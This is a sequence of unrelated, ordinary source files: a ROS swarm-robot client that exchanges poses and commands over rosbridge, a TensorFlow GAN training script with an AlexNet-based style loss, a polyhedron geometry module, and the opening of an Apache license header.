        self.__swarm_heartbeat = roslibpy.Topic(self.__ros_client, 'swarm_hearbeat', 'swarm_msgs/SwarmHeartbeat')
        # self.__move_base_pub = rospy.Publisher('swarm_goal', PoseStamped, queue_size=30)
        self.__move_base_pub = rospy.Publisher('move_base_simple/goal', PoseStamped, queue_size=30)
        self.__cmd_pub = rospy.Publisher('yocs_cmd_vel_mux/input/navigation_cmd', Twist, queue_size=30)
        # self.__cmd_pub = rospy.Publisher('test_cmd', Twist, queue_size=30)
        self.__target_pose = PoseStamped()
        self.__swarm_base_pose = Pose()
        self.__ros_client.on_ready(self.__start_sending, run_in_thread=True)
        self.__ros_client.on_ready(self.__start_receiving, run_in_thread=True)
        self.__ros_client.run()
        rospy.loginfo('Swarm client started')

    def target_pose(self):
        """Return the last computed formation target pose (PoseStamped)."""
        return self.__target_pose

    def swarm_base_pose(self):
        """Return the last received swarm base pose (Pose)."""
        return self.__swarm_base_pose

    def __load_swarm_trans(self):
        """Load formation offsets (one PyKDL.Frame per command name) from params."""
        type_list = rospy.get_param('swarm_trans')
        self.__swarm_trans = {}
        for name in type_list:
            # data layout: [x, y, z, roll, pitch, yaw]
            data = rospy.get_param('swarm_trans/'+name)
            self.__swarm_trans[name] = PyKDL.Frame(PyKDL.Rotation.RPY(data[3], data[4], data[5]), PyKDL.Vector(data[0], data[1], data[2]))
        rospy.loginfo("get %d swarm type: %s", len(type_list), type_list)

    def __joy_callback(self, message):
        """Forward a joystick Twist from the base to the local cmd topic (joy mode only)."""
        cmd = Twist()
        cmd.linear.x = message['linear']['x']
        cmd.linear.y = message['linear']['y']
        cmd.linear.z = message['linear']['z']
        cmd.angular.x = message['angular']['x']
        cmd.angular.y = message['angular']['y']
        cmd.angular.z = message['angular']['z']
        if self.__current_command == 'joy':
            self.__cmd_pub.publish(cmd)

    def __command_callback(self, message):
        """Handle a swarm command: update the mode and compute this robot's
        target pose from the base pose plus this robot's formation offset."""
        # BUGFIX: dict.has_key() was removed in Python 3; 'in' works on 2 and 3
        if message['command'] not in self.__swarm_trans:
            if message['command'] != 'dismiss' and message['command'] != 'joy':
                rospy.logwarn('unknown command type %s', message['command'])
            # NOTE(review): 'dismiss'/'joy' also return here without updating
            # __current_command - confirm that is intended
            return
        self.__current_command = message['command']
        self.__swarm_base_pose.position.x = message['pose']['position']['x']
        self.__swarm_base_pose.position.y = message['pose']['position']['y']
        self.__swarm_base_pose.position.z = message['pose']['position']['z']
        self.__swarm_base_pose.orientation.x = message['pose']['orientation']['x']
        self.__swarm_base_pose.orientation.y = message['pose']['orientation']['y']
        self.__swarm_base_pose.orientation.z = message['pose']['orientation']['z']
        self.__swarm_base_pose.orientation.w = message['pose']['orientation']['w']
        p = posemath.fromMsg(self.__swarm_base_pose)
        self.__target_pose.header.stamp = rospy.Time.now()
        self.__target_pose.header.frame_id = 'map'
        # Apply this robot's formation offset to the base pose
        self.__target_pose.pose = posemath.toMsg(p*self.__swarm_trans[self.__current_command])
        # self.__move_base_pub.publish(self.__target_pose)

    def __start_sending(self):
        """Publish this robot's map-frame pose to the base at 2 Hz while connected."""
        rospy.loginfo('start sending')
        # send robot heartbeat msg to swarm_base robot
        rate = rospy.Rate(2)
        while self.__ros_client.is_connected:
            try:
                (trans, orient) = self.__tf_listener.lookupTransform('map', self.__robot_frame_id, rospy.Time(0))
                pose_msg = {}
                pose_msg['position'] = {'x': trans[0], 'y': trans[1], 'z': trans[2]}
                pose_msg['orientation'] = {'x': orient[0], 'y': orient[1], 'z': orient[2], 'w': orient[3]}
                heartbeat_msg = {}
                heartbeat_msg['header'] = {}
                heartbeat_msg['header']['stamp'] = rospy.Time.now()
                heartbeat_msg['header']['frame_id'] = self.__robot_name
                heartbeat_msg['state'] = self.__current_command
                heartbeat_msg['pose'] = pose_msg
                self.__swarm_heartbeat.publish(roslibpy.Message(heartbeat_msg))
            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
                # Fixed log message typo ('tf 1error')
                rospy.logwarn('tf error, %s' % e)
            # rospy.loginfo('Swarm State: command %s', self.__current_command)
            rate.sleep()

    def __start_receiving(self):
        """Subscribe to the base's joystick and swarm command topics."""
        rospy.loginfo('start receiving')
        self.__joy_command.subscribe(self.__joy_callback)
        self.__swarm_command.subscribe(self.__command_callback)

    def run(self):
        pass

    def close(self):
        """Unsubscribe and schedule rosbridge connection shutdown."""
        self.__swarm_command.unsubscribe()
        self.__ros_client.call_later(2, self.__ros_client.terminate)
def main():
    """Run the swarm client node until ROS shutdown, then clean up."""
    rospy.init_node('swarm_client')
    client = SwarmClient()
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        rate.sleep()
    rospy.loginfo('shutdown....')
    client.close()
    rospy.loginfo('ok')
if __name__ == '__main__':
    # Entry point when launched as a ROS node script
    main()
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
import numpy as np
import scipy.misc
from alexnet import *
from matplotlib import pyplot as plt
from skimage import io, transform
from scipy.misc import imread, imresize
from data_processing import DataLoader_vessel as DataLoader
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
# ---- experiment configuration ----
L_ad = 1          # weight of the adversarial loss
L_content = 1     # weight of the content/style loss
L_tv = 0          # weight of the total-variation loss
mode = 'Ours'
BATCH_SIZE = 2
sysstr = "Linux"
Z_DIM = 400       # dimensionality of the generator noise vector
LR = 0.0002
LR_str = '_lr2-4'
dataset = 'OURS'
img_H = 512       # input/output image height and width
save_size = [1, 1]
# Build the result directory path once instead of repeating the same long
# expression three times, and create missing parent directories too
# (os.mkdir only creates the leaf and fails when parents are absent).
SAVE_PATH = ('result/' + dataset + '/' + mode + '/Lad_' + str(L_ad) + '_Lst_' + str(L_content) + '_Ltv_' + str(
    L_tv) + '_uniform')
if not os.path.isdir(SAVE_PATH):
    os.makedirs(SAVE_PATH)
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
def bp(loss_label, a, g, sess):
    """Gradients of `loss_label` w.r.t. tensor `a` with guided-ReLU override.

    Remaps the 'Relu' op to the registered 'bpRelu' op inside graph `g`
    while the gradient graph is constructed. (`sess` is accepted but unused.)
    """
    with g.as_default():
        with g.gradient_override_map({'Relu': 'bpRelu'}):
            return tf.gradients(loss_label, a)[0]
def lrelu(x, leak=0.2, name='lrelu'):
    """Leaky ReLU: x for x >= 0, leak * x otherwise.

    Implemented branch-free as a linear combination of x and |x|, which is
    algebraically equal to max(x, leak * x).
    """
    with tf.variable_scope(name):
        pos_coeff = 0.5 * (1 + leak)
        neg_coeff = 0.5 * (1 - leak)
        return pos_coeff * x + neg_coeff * abs(x)
def save_images(images, size, path):
    """Tile a batch of images onto a single canvas and save it to `path`.

    The best size number is
        int(max(sqrt(image.shape[0]), sqrt(image.shape[1]))) + 1
    example:
        batch_size 64 -> size [8, 8]; batch_size 32 -> size [6, 6]
    """
    # Images are assumed to be already normalised (e.g. tanh generator output)
    h, w = images.shape[1], images.shape[2]
    # One big canvas holding size[0] x size[1] tiles of h x w x 3 each
    canvas = np.zeros((h * size[0], w * size[1], 3))
    # Copy each image into its grid cell on the canvas
    for idx, image in enumerate(images):
        col = idx % size[1]
        row = idx // size[1]
        canvas[row * h:row * h + h, col * w:col * w + w, :] = image
    # Write the canvas out to disk
    return scipy.misc.imsave(path, canvas)
def remove_all_file(path):
    """Delete every regular file directly inside `path`.

    No-op when `path` is not a directory. Subdirectories (and their
    contents) are left untouched - previously os.remove would raise on a
    subdirectory entry.
    """
    if os.path.isdir(path):
        for name in os.listdir(path):
            entry = os.path.join(path, name)
            # Only remove regular files; skip subdirectories
            if os.path.isfile(entry):
                os.remove(entry)
# Weight/bias initialisers shared by the generator and discriminator layers
initializer = tf.truncated_normal_initializer(stddev=0.02)
bias_initializer = tf.constant_initializer(0.0)
def discriminator(image, reuse=False):
    """DCGAN-style discriminator: six stride-2 4x4 convolutions followed by
    a single-logit fully-connected layer.

    Args:
        image: input batch, NHWC (real or generated, possibly concatenated
            with a condition map by the caller).
        reuse: reuse variable scopes for a second call on fake samples.

    Returns:
        (d_out, d_out_logits): sigmoid probability and raw logits.
    """
    # Base channel count; doubled at (almost) every downsampling step
    n = 32
    bn = slim.batch_norm
    # NOTE(review): scope name 'disciminator' is a typo, kept because
    # changing it would alter op names (and any graph references to them)
    with tf.name_scope("disciminator"):
        # original
        # First layer has no batch norm (standard DCGAN practice)
        dis1 = slim.convolution2d(image, n, [4, 4], 2, activation_fn=lrelu,
                                  reuse=reuse, scope='d_conv1', weights_initializer=initializer)
        dis2 = slim.convolution2d(dis1, 2 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
                                  reuse=reuse, scope='d_conv2', weights_initializer=initializer)
        dis3 = slim.convolution2d(dis2, 4 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
                                  reuse=reuse, scope='d_conv3', weights_initializer=initializer)
        dis4 = slim.convolution2d(dis3, 8 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
                                  reuse=reuse, scope='d_conv4', weights_initializer=initializer)
        dis5 = slim.convolution2d(dis4, 16 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
                                  reuse=reuse, scope='d_conv5', weights_initializer=initializer)
        dis6 = slim.convolution2d(dis5, 16 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
                                  reuse=reuse, scope='d_conv6', weights_initializer=initializer)
        # Flatten and map to a single real/fake logit
        d_out_logits = slim.fully_connected(slim.flatten(dis6), 1, activation_fn=None, reuse=reuse, scope='d_out',
                                            weights_initializer=initializer)
        d_out = tf.nn.sigmoid(d_out_logits)
        return d_out, d_out_logits
def generator(image, z, n=64, is_train=True):
    """U-Net style conditional generator.

    Encodes `image` through six stride-2 convolutions, injects the noise
    vector `z` at the bottleneck, then decodes with transposed convolutions
    and encoder skip connections.

    Args:
        image: condition input (e.g. vessel map), NHWC.
        z: noise vector, shape [batch, Z_DIM].
        n: base channel count.
        is_train: unused - NOTE(review): batch_norm is never given an
            is_training argument, so it always runs in training mode;
            confirm that is intended.

    Returns:
        (gen_out, gen_out_227): full-resolution sigmoid output and a
        227x227 resize for the AlexNet-based style loss.
    """
    with tf.name_scope("generator"):
        # original
        # NOTE(review): e1 already has activation_fn=lrelu, and lrelu is
        # applied *again* when computing e2 - the double activation is kept
        # as-is since removing it would change the trained behaviour
        e1 = slim.conv2d(image, n, [4, 4], 2, activation_fn=lrelu, scope='g_e1_conv',
                         weights_initializer=initializer)
        # 256
        e2 = slim.conv2d(lrelu(e1), 2 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                         scope='g_e2_conv',
                         weights_initializer=initializer)
        # 128
        e3 = slim.conv2d(lrelu(e2), 4 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                         scope='g_e3_conv',
                         weights_initializer=initializer)
        # 64
        e4 = slim.conv2d(lrelu(e3), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                         scope='g_e4_conv',
                         weights_initializer=initializer)
        # 32
        e5 = slim.conv2d(lrelu(e4), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                         scope='g_e5_conv',
                         weights_initializer=initializer)
        # # 16
        e6 = slim.conv2d(lrelu(e5), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                         scope='g_e6_conv',
                         weights_initializer=initializer)
        # Project the noise vector to an 8x8xn feature map for the bottleneck
        zP = slim.fully_connected(z, 8 * 8 * n, normalizer_fn=None, activation_fn=lrelu, scope='g_project',
                                  weights_initializer=initializer)
        zCon = tf.reshape(zP, [-1, 8, 8, n])
        # gen1 = slim.conv2d_transpose(lrelu(zCon), 2 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
        #                              scope='g_dconv1', weights_initializer=initializer)
        # 8
        # Concatenate noise features with the deepest encoder features
        gen1 = tf.concat([zCon, e6], 3)
        gen2 = slim.conv2d_transpose(lrelu(gen1), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                                     scope='g_dconv2', weights_initializer=initializer)
        # 16
        gen2 = tf.concat([gen2, e5], 3)
        gen3 = slim.conv2d_transpose(lrelu(gen2), 4 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
                                     scope='g_dconv3', weights_initializer=initializer)
        gen3 = tf.concat([gen3, e4], 3)
        # 32
        # NOTE(review): the decoder switches from lrelu to plain relu from
        # here on - kept as in the original
        gen6 = slim.conv2d_transpose(tf.nn.relu(gen3), 2 * n, [4, 4], 2, normalizer_fn=slim.batch_norm,
                                     activation_fn=None,
                                     scope='g_dconv6', weights_initializer=initializer)
        gen6 = tf.concat([gen6, e3], 3)
        # 64
        gen7 = slim.conv2d_transpose(tf.nn.relu(gen6), n, [4, 4], 2, normalizer_fn=slim.batch_norm,
                                     activation_fn=None,
                                     scope='g_dconv7', weights_initializer=initializer)
        gen7 = tf.concat([gen7, e2], 3)
        gen8 = slim.conv2d_transpose(tf.nn.relu(gen7), n, [4, 4], 2, normalizer_fn=slim.batch_norm,
                                     activation_fn=None,
                                     scope='g_dconv8', weights_initializer=initializer)
        gen8 = tf.concat([gen8, e1], 3)
        # 128
        # Final layer maps back to 3 channels with sigmoid output in [0, 1]
        gen_out = slim.conv2d_transpose(tf.nn.relu(gen8), 3, [4, 4], 2, activation_fn=tf.nn.sigmoid,
                                        scope='g_out', weights_initializer=initializer)
        gen_out_227 = tf.image.resize_images(gen_out, [227, 227])
        return gen_out, gen_out_227
def styleloss_RNFLD(syn, style_gram, weight_gram, sess):
    """Weighted style (gram-feature) loss against AlexNet conv features.

    Runs the synthesised image through a pretrained AlexNet and compares
    its (weighted) conv-layer activations to the precomputed style target.

    :param syn: tf N,227,227,3 - synthesised images
    :param style_gram: ndarray N,6*6,256 - target style features
    :param weight_gram: ndarray N,6*6,256 - per-feature weights
    :param sess: session used to restore the AlexNet checkpoint
    :return: scalar style loss tensor
    """
    net_syn = AlexNet(syn, num_classes=2, is_training=False)
    with slim.arg_scope(AlexNet.alexnet_v2_arg_scope()):
        # Share weights with the AlexNet instance built elsewhere in the graph
        tf.get_variable_scope().reuse_variables()
        k_syn = net_syn.alexnet_v3()
        # k_syn[7] is the conv feature map used for the style comparison
        cnn_output_syn = k_syn[7]
    # NOTE(review): the [71:85] slice hard-codes which restorable variables
    # belong to AlexNet - fragile if the graph construction order changes
    variables = tf.contrib.framework.get_variables_to_restore()[71:85]
    saver_syn = tf.train.Saver(variables)
    model_file1 = tf.train.latest_checkpoint('./ckpt3/')
    # Restore the pretrained AlexNet weights into the current session
    saver_syn.restore(sess, model_file1)
    # Flatten spatial dims: N,6,6,256 -> N,6*6,256 to match style_gram layout
    cnn_output_syn = tf.reshape(cnn_output_syn, shape=[-1, cnn_output_syn._shape_as_list()[1]
                                                       * cnn_output_syn._shape_as_list()[2],
                                                       cnn_output_syn._shape_as_list()[3]])  # N,6*6,256
    syn_gram = tf.multiply(weight_gram, cnn_output_syn)
    style_loss = tf.reduce_mean(tf.square(syn_gram - style_gram))
    return style_loss
def get_tv_loss(img):
    """Anisotropic total-variation loss on an NHWC image batch.

    Mean absolute difference between neighbouring pixels along the height
    and width axes, summed.
    """
    diff_h = img[:, 1:, :, :] - img[:, :-1, :, :]
    diff_w = img[:, :, 1:, :] - img[:, :, :-1, :]
    return tf.reduce_mean(tf.abs(diff_h)) + tf.reduce_mean(tf.abs(diff_w))
def main():
    """TF1 training loop for the vessel-conditioned GAN with AlexNet style loss.

    Builds the generator/discriminator graph, restores a pretrained AlexNet
    whose gradient-weighted conv features drive the style loss, then
    alternates one discriminator step with two generator steps per batch.
    """
    sess = tf.InteractiveSession()
    global_step = tf.Variable(0, name='global_step', trainable=False)
    # Graph inputs.
    images = tf.placeholder(tf.float32, [BATCH_SIZE, img_H, img_H, 3], name='real_images')
    z = tf.placeholder(tf.float32, [BATCH_SIZE, Z_DIM], name='z')
    vessel = tf.placeholder(tf.float32, [BATCH_SIZE, img_H, img_H, 3], name='vessel')
    style_gram = tf.placeholder(tf.float32, [BATCH_SIZE, None, None], name='style_gram')
    weight_gram = tf.placeholder(tf.float32, [BATCH_SIZE, None, None], name='weight_gram')
    X = tf.placeholder(tf.float32, [None, 227, 227, 3])  # AlexNet input batch (original comment referred to flattened MNIST vectors)
    # Generator and conditional discriminator (vessel map concatenated on channels).
    G, G_227 = generator(vessel, z)
    images_ = tf.concat([images, vessel], 3)
    G_ = tf.concat([G, vessel], 3)
    D, D_logits = discriminator(images_)
    D_, D_logits_ = discriminator(G_, reuse=True)
    sess.run(tf.global_variables_initializer())
    # Pretrained AlexNet: gradients of the class-1 logit w.r.t. conv features
    # yield per-channel importance weights (Grad-CAM-style weighting).
    net = AlexNet(X, num_classes=2, is_training=False)
    with slim.arg_scope(AlexNet.alexnet_v2_arg_scope()):
        k = net.alexnet_v3()
    logits = k[11]
    norm_grads = tf.gradients(logits[:, 1], k[7])[0]  # 55,55,64
    # NOTE(review): hard-coded variable slice [71:85] must match the AlexNet
    # variables in the checkpoint -- confirm against ./ckpt3/.
    variables = tf.contrib.framework.get_variables_to_restore()[71:85]
    saver_syn = tf.train.Saver(variables)
    model_file1 = tf.train.latest_checkpoint('./ckpt3/')
    saver_syn.restore(sess, model_file1)
    "---------------------------------------------------------------"
    # Standard GAN sigmoid cross-entropy losses.
    d_loss_real = tf.reduce_mean(
        tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logits, labels=tf.ones_like(D)))
    d_loss_fake = tf.reduce_mean(
        tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logits_, labels=tf.zeros_like(D_)))
    d_loss = d_loss_real + d_loss_fake
    g_loss_style = styleloss_RNFLD(G_227, style_gram, weight_gram, sess=sess)
    g_loss_ad = tf.reduce_mean(
        tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logits_, labels=tf.ones_like(D_)))
    g_loss_tv = get_tv_loss(G)
    # Weighted sum: adversarial + style ("content") + total-variation smoothness.
    g_loss = L_ad * g_loss_ad + L_content * g_loss_style + L_tv * g_loss_tv
    t_vars = tf.trainable_variables()
    d_vars = [var for var in t_vars if 'd_' in var.name]
    g_vars = [var for var in t_vars if 'g_' in var.name]
    saver2 = tf.train.Saver(max_to_keep=10)
    d_optim = tf.train.GradientDescentOptimizer(LR).minimize(d_loss, var_list=d_vars, global_step=global_step)
    g_optim = tf.train.GradientDescentOptimizer(LR).minimize(g_loss, var_list=g_vars, global_step=global_step)
    dataloader = DataLoader(batch_size=BATCH_SIZE, input_size=np.array([img_H, img_H]), sysstr=sysstr, path=dataset)
    dataloader_test = DataLoader(batch_size=BATCH_SIZE, input_size=np.array([img_H, img_H]), sysstr=sysstr,
                                 path=dataset)
    num_batches = dataloader.num_batches
    sample_z = np.random.uniform(0, 1, size=(BATCH_SIZE, Z_DIM))
    _, batch_vessel_test, _ = dataloader_test.get_batch()
    count = 0
    for epoch in range(2400):
        for idx in range(num_batches):
            batch_images, batch_vessel, img_name = dataloader.get_batch()
            batch_z = np.random.uniform(0, 1, size=(BATCH_SIZE, Z_DIM))
            batch_images_227 = transform.resize(batch_images, [BATCH_SIZE, 227, 227])  # N,227,227,3
            # Real-batch features and their gradients provide the per-channel
            # style weights fed back into the generator loss.
            cnn_out, norm_grads_1 = sess.run([k[7], norm_grads], feed_dict={X: batch_images_227})
            weights = np.mean(np.abs(norm_grads_1), axis=(1, 2))  # N,256
            weight_gram_temp = np.expand_dims(weights, axis=1)  # N,1,256
            weight_gram_temp1 = np.repeat(weight_gram_temp, 6 * 6, axis=1)  # N,6*6,256
            Style_gram = np.reshape(cnn_out, [-1, cnn_out.shape[1] * cnn_out.shape[2], cnn_out.shape[3]])  # N,6*6,256
            style_gram1 = np.multiply(weight_gram_temp1, Style_gram)
            feed_dict_g = {images: batch_images, z: batch_z, vessel: batch_vessel, weight_gram: weight_gram_temp1,
                           style_gram: style_gram1}
            # One discriminator update, then two generator updates per batch.
            _ = sess.run(d_optim, feed_dict={images: batch_images, z: batch_z, vessel: batch_vessel})
            _ = sess.run(g_optim, feed_dict=feed_dict_g)
            _ = sess.run(g_optim, feed_dict=feed_dict_g)
            # Loss values for monitoring (not otherwise used here).
            errD_fake = d_loss_fake.eval({z: batch_z, vessel: batch_vessel})
            errD_real = d_loss_real.eval({images: batch_images, vessel: batch_vessel})
            errG = g_loss.eval(feed_dict_g)
            count = count + 1
# Script entry point.
if __name__ == '__main__':
    # Optional cleanup of previous outputs:
    # remove_all_file(SAVE_PATH)
    main()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: <NAME>
"""
from . import transformation as trans
import numpy as np
import vg
import itertools as it
from scipy.spatial import ConvexHull
class ConvexPolyhedron(object):
    """Root class for convex polyhedra.

    :param center: (3,) center coordinate; defaults to the origin.
    :param n_vertex: number of vertices (V), or None if unknown.
    :param n_edge: number of edges (E), or None if unknown.
    """

    def __init__(self, center=None, n_vertex=None, n_edge=None):
        # Default handled here to avoid a shared mutable np.array default arg.
        self.center = np.array([0, 0, 0]) if center is None else center
        self.n_vertex = n_vertex
        self.n_edge = n_edge

    @property
    def n_face(self):
        """Number of faces from Euler's formula V - E + F = 2, i.e. F = E - V + 2.

        Bug fix: the previous ``V + E - 2`` is not Euler's formula (it gave
        16 faces for an octahedron instead of 8). Returns None when V or E
        is unknown.
        """
        if self.n_vertex is None or self.n_edge is None:
            return None
        return self.n_edge - self.n_vertex + 2

    @property
    def is_proper_shape(self):
        """True when V, E and the derived F are all known and positive."""
        if self.n_vertex is None or self.n_edge is None:
            return False
        return self.n_vertex > 0 and self.n_edge > 0 and self.n_face > 0

    def is_corner_sharing(ph1, ph2, **kwargs):
        """Determine if two polyhedra share exactly one corner.

        Bug fix: the original called ``np.allclose(ph.vertices, v)``, which is
        True only when *every* vertex coincides with ``v``; each vertex of the
        smaller polyhedron is now matched against any vertex of the larger.
        Extra keyword arguments are forwarded to ``np.isclose`` (rtol/atol).
        """
        if ph1.n_vertex >= ph2.n_vertex:
            big, small = ph1, ph2
        else:
            big, small = ph2, ph1
        nclose = 0
        for v in small.vertices:
            # v matches when some row of big.vertices is close in all coords.
            if np.any(np.all(np.isclose(big.vertices, v, **kwargs), axis=1)):
                nclose += 1
        # It's counted as corner sharing iff exactly one vertex is common.
        return nclose == 1
class Face(object):
    """Coplanar polygon data structure featuring an ordered vertex list.

    :param vertices: (n, 3) numpy array of vertex coordinates, n >= 3.
    :param order: 'cw' (clockwise) or 'ccw' (counterclockwise) vertex order.
    """

    def __init__(self, vertices, order='cw'):
        self.vertices = vertices
        self.n_vertex = len(vertices)
        if self.n_vertex < 3:
            raise ValueError('Number of vertices should be at least 3!')
        # Calculate basic properties of the polygon (order matters:
        # normals need edges, edges need vertices).
        self.calculate_center()
        self.vertex_order(order=order)
        self.calculate_edges()
        self.calculate_normal()

    def vertex_order(self, order='cw'):
        """Build the 1-based vertex dictionary.

        NOTE(review): despite the name, no actual cw/ccw reordering is
        performed -- vertices are assumed to arrive already ordered.
        """
        keys = list(range(1, self.n_vertex + 1))
        self.verts_dict = dict(zip(keys, self.vertices))

    def calculate_center(self):
        """Calculate the center coordinate of the face polygon."""
        self.center = self.vertices.mean(axis=0)

    def calculate_normal(self):
        """Calculate the unit normal vector of the face in 3D."""
        normal = np.cross(self.edges[1], self.edges[2])
        self.unit_normal = normal / np.linalg.norm(normal)

    def calculate_edges(self):
        """Calculate edge vectors and lengths (wrapping last -> first vertex)."""
        self.edges = np.diff(self.vertices, axis=0, append=self.vertices[:1])
        self.edgelengths = np.linalg.norm(self.edges, axis=1)

    def calculate_area(self):
        """Area of the face in 3D (planar polygon, shoelace formula).

        Bug fix: the accumulator is now float -- ``np.array([0, 0, 0])`` is
        integer-typed, so in-place addition of float cross products raised a
        numpy casting error whenever the vertices were floats.
        """
        total = np.zeros(3)
        for i in range(self.n_vertex):
            vi1 = self.vertices[i]
            vi2 = self.vertices[(i + 1) % self.n_vertex]
            total += np.cross(vi1, vi2)
        self.area = abs(np.dot(total, self.unit_normal) / 2)
class Ordering(object):
    """Class for ordering of a point set.

    ``n`` gives the size of each part of the set; ``indices`` holds one
    index list ``[0, ..., n_i - 1]`` per part.
    """

    def __init__(self, *n):
        self.n = n
        self.n_parts = len(n)
        self.indices = [list(range(ni)) for ni in n]

    def cartesian_product_ordering(self):
        """Calculate the Cartesian product ordering of the set.

        Bug fix: the original ``it.product(*[self.indices*self.n])``
        multiplied a list by a tuple and raised TypeError. For a single part
        of size n[0] this now yields all n[0]-tuples over its indices; for
        several parts, the product across the parts.
        """
        if self.n_parts == 1:
            ordered_indices = it.product(self.indices[0], repeat=self.n[0])
        else:
            ordered_indices = it.product(*self.indices)
        return list(ordered_indices)

    def cwr_ordering(self):
        """Calculate the set ordering by combination with replacement (CWR).

        Bug fix: the original passed the list-of-lists and the ``n`` tuple
        straight to ``it.combinations_with_replacement`` (TypeError). Only
        defined for a single part; returns None otherwise (as before).
        """
        if self.n_parts == 1:
            ordered_indices = it.combinations_with_replacement(self.indices[0], self.n[0])
            return list(ordered_indices)

    def permute(self, shift, keep=True):
        """Cyclically shift the indices; store the result when ``keep``."""
        rolled = np.roll(self.indices, shift=shift)
        if keep:
            self.indices = rolled.tolist()
class DoubletOrdering(Ordering):
    """Ordering of two things: index doublets over a two-element set."""

    def __init__(self, type='cwr'):
        super().__init__(2)
        # Pick the enumeration strategy requested by the caller.
        if type == 'cwr':
            self.ordered_indices = self.cwr_ordering()
        elif type == 'cartesian':
            self.ordered_indices = self.cartesian_product_ordering()
class TripletOrdering(Ordering):
    """Ordering of three things: index triplets over a three-element set."""

    def __init__(self, type='cwr'):
        super().__init__(3)
        # Pick the enumeration strategy requested by the caller.
        if type == 'cwr':
            self.ordered_indices = self.cwr_ordering()
        elif type == 'cartesian':
            self.ordered_indices = self.cartesian_product_ordering()
class Octahedron(ConvexPolyhedron):
    """Octahedral object with coordinate transformation of its vertices and faces."""

    def __init__(self, n_vertex=6, n_edge=12, vertices=None, **kwargs):
        """
        :param vertices: optional (6, 3) vertex array; when given, the center
            is the vertex mean, otherwise ``kwargs['center']`` (origin default).
        """
        if vertices is None:
            center = kwargs.pop('center', np.array([0, 0, 0]))
        else:
            center = np.mean(vertices, axis=0)
        super().__init__(center=center, n_vertex=n_vertex, n_edge=n_edge)
        self.vertices = vertices

    @property
    def convex_hull(self):
        """Convex hull of the vertices (None when it cannot be built)."""
        try:
            return ConvexHull(self.vertices)
        except Exception:  # vertices unset, malformed, or degenerate (QhullError)
            return None

    @property
    def volume(self):
        """Volume of the octahedron (None when no hull is available)."""
        try:
            return self.convex_hull.volume
        except AttributeError:  # convex_hull returned None
            return None

    def generate_vertices(self, radius, poly_type='regular', angles=None, alpha=0, beta=0, gamma=0):
        """Generate the vertex coordinates of the octahedron.

        :param radius: scalar for 'regular'; 3 half-axes for 'rhom_bipyramid';
            6 signed apex offsets for 'asym_bipyramid'.
        :param angles: optional (alpha, beta, gamma) tuple overriding the
            individual pose-angle arguments.
        """
        self.poly_type = poly_type
        # Generate the coordinates of vertices.
        if self.poly_type == 'regular':  # regular octahedron
            a = radius
            self.vertices = np.array([[a, 0, 0], [-a, 0, 0],
                                      [0, a, 0], [0, -a, 0],
                                      [0, 0, a], [0, 0, -a]])
        elif self.poly_type == 'rhom_bipyramid':  # rhombic bipyramid
            a, b, c = radius
            self.vertices = np.array([[a, 0, 0], [-a, 0, 0],
                                      [0, b, 0], [0, -b, 0],
                                      [0, 0, c], [0, 0, -c]])
        elif self.poly_type == 'asym_bipyramid':  # asymmetric bipyramid
            self.vertices = np.array([[radius[0], 0, 0], [radius[1], 0, 0],
                                      [0, radius[2], 0], [0, radius[3], 0],
                                      [0, 0, radius[4]], [0, 0, radius[5]]])
        # Rotate according to the pose angles (about the center).
        if angles is not None:
            alpha, beta, gamma = angles
        ctr = self.center
        transform_list = [trans.translation3D(*ctr), trans.rotzh(gamma),
                          trans.rotyh(beta), trans.rotxh(alpha),
                          trans.translation3D(*-ctr)]
        # Bug fix: np.matmul() only accepts two operands; the original
        # unpacked five matrices into it. Chain-multiply instead.
        transform_matrix = transform_list[0]
        for mat in transform_list[1:]:
            transform_matrix = np.matmul(transform_matrix, mat)
        # NOTE(review): assumes trans.* return 4x4 homogeneous matrices --
        # apply to homogeneous coordinates, then drop the last component.
        homogeneous = np.hstack([self.vertices, np.ones((len(self.vertices), 1))])
        self.vertices = np.matmul(transform_matrix, homogeneous.T).T[:, :3]
        # Create the 1-based vertex dictionary.
        # Bug fix: was ``range(1, len(self.n_vertex)+1)`` / ``dict(keys, ...)``
        # -- len() of an int and a two-positional dict() both raise TypeError.
        keys = range(1, len(self.vertices) + 1)
        self.verts_dict = dict(zip(keys, self.vertices))

    @property
    def apical_vector(self):
        """Apical vector of the octahedron.

        self.vertices[0] is the vertex on the far side,
        self.vertices[-1] is the vertex on the near side.
        """
        return self.vertices[0] - self.vertices[-1]

    def vector_orientation(self, vector, refs=None):
        """Orientation angles of a vector w.r.t. reference axes (default x, y, z)."""
        if refs is None:
            refs = [np.array([1, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 1])]
        return [vg.angle(vector, ref) for ref in refs]
|
#
# Copyright (c) 2019 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
